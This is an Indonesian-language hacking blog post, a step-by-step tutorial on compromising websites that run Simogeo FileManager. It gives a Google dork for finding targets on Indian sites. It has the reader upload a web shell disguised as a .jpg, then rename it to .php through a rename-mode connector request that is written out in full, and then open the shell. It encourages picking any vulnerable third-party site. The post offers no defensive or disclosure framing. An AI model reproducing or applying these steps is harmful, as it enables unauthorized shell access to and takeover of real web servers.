SIMOGEO FileManager File Upload Vulnerability



Assalamualaikum Wr WB
Ketemu lagi sama saya kali ini saya mau kasih tutorial Simogeo Filemanager File Upload
Langsung saja ye gk usah basa basi

Sedia in :
  1. Dork : inurl:/filemanager site:in
  2. Exploit Change Extension : /connectors/php/filemanager.php?mode=rename&old=/[path]/userfiles/shell.jpg&new=shell.php&config=filemanager.config.js
  3. Shell
  4. Kopi
Step : 

1. Dorking aja di google image kaya biasa
2. Pilih satu yg menurut agan mulus dan perawan,janda juga gapapa kalo enak
3. Buka Filemanager nya di site.com/[path]/filemanager/index.html

Simogeo Filemanager
4. Upload Shell berekstensi .jpg (ex:shell.jpg)

Upload Sukses
5. Rename dari shell.jpg ke shell.php
Caranya : 
Tambah Exploit Ini :
/connectors/php/filemanager.php?mode=rename&old=/[path]/userfiles/shell.jpg&new=shell.php&config=filemanager.config.js
 Di Belakang site.com/[path]/filemanager/ 
Jangan Lupa Sesuain apa path filemanager nya

Kalo Sukses Rename Kaya Gini

6. Akses Shell nya 
di site.com/[path]/filemanager/userfiles/shell.php

Sekian Tutorial nya ^_^ kalo ada yg salah saya mohon maaf yeee
Wasalamualaikum Wr WB 

0 Response to "SIMOGEO FileManager File Upload Vulnerability"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel